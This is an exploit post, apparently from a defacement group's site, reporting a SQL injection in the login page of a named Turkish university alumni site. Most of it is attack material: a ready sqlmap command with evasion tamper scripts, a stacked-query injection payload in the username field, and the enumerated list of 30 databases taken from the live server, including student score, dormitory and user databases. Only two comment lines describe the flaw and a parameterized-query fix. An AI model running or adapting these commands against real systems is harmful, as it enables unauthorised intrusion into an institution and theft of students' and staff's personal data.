#####################################################
# Exploit Title: mezun.nny.edu.tr POST-based SQL Injection Vulnerability
# Date: 07.12.2020
# Exploit Author: Nobody 
# Tested on: Linux / Windows
#####################################################

# Exploit (sqlmap invocation, followed by its output):
# sqlmap -u "https://mezun.nny.edu.tr/login.php" --forms --batch --random-agent --dbs --tamper=between,space2comment

Parameter: username (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
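    Payload: username=PqkU';WAITFOR DELAY '0:0:5'--&babaadi=&dtarihi=KhKc

# Note: the 5-second delay indicates that the username value is concatenated into the T-SQL login statement unescaped and that a second statement is accepted in the same batch.
# The corresponding fix is a parameterized query for the login lookup; until then, the permissions of the application's database login are the only limit on what an injected statement can do.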

available databases [30]:
[*] [!]
[*] ac?tvitydb
[*] cateringdb
[*] cateringdbtest
[*] dormdb
[*] GKAPIDB
[*] graduated
[*] intoffice
[*] itdb
[*] itdbtest
[*] logdb
[*] master
[*] model
[*] msdb
[*] ogs
[*] promotion
[*] qualitydb
[*] records
[*] ReportServer$BTUSERSQL
[*] ReportServer$BTUSERSQLTempDB
[*] saffairsdb
[*] spos
[*] spostest
[*] studentscoredb
[*] summerschooldb
[*] surveydb
[*] tempdb
[*] transition
[*] userdb
[*] webdb

#####################################################

# SpyHackerZ.org